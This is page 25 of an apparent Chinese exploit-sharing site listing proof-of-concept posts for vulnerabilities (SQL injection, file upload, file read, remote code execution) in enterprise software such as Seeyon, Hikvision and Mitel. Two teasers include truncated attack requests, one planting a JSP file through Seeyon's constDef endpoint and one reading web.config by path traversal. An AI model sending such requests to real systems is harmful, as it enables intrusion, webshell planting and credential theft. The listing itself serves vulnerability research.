POC 第25页
排序
九思-OA-任意文件上传_秃兔安全

九思-OA-任意文件上传

2024你懂的
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01077
【通用】畅捷通CRM newleadhidden SQL注入_秃兔安全

【通用】畅捷通CRM newleadhidden SQL注入

fofa语句yakit插件 uuid pocyaml  已验证  
付费阅读500# poc
dreamer292的头像_秃兔安全至尊玉兔dreamer2929个月前
01078
赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞_秃兔安全

赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞

2024你懂的
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
010714
【通用】 杜特网上订单系统getUserImage SQL注入漏洞_秃兔安全

【通用】 杜特网上订单系统getUserImage SQL注入漏洞

fofa 语句yakit插件 uuidpocyakit yamlnuclei yaml已验证    
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
2024你懂的
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
010713
天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞_秃兔安全

天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞

GET /HM/ Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firef...
2024你懂的
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01076
【通用】unibox路由器 postprosa SQL注入_秃兔安全

【通用】unibox路由器 postprosa SQL注入

fofa语句yakit插件 uuidpocyaml   
付费阅读500# poc
dreamer292的头像_秃兔安全至尊玉兔dreamer2928个月前
010715
【通用】 海康威视运行管理中心applyST远程代码执行漏洞_秃兔安全

【通用】 海康威视运行管理中心applyST远程代码执行漏洞

fofa 语句yakit插件uuidpocyakit && nuclei yaml已验证   
AJ-Report开源数据大屏存在远程命令执行漏洞_秃兔安全

AJ-Report开源数据大屏存在远程命令执行漏洞

2024你懂的
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
010715
【通用】 MitelMiCollab 身份绕过导致任意文件读取 CVE-2024-41713_秃兔安全

【通用】 MitelMiCollab 身份绕过导致任意文件读取 CVE-2024-41713

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证    
1232425262755跳转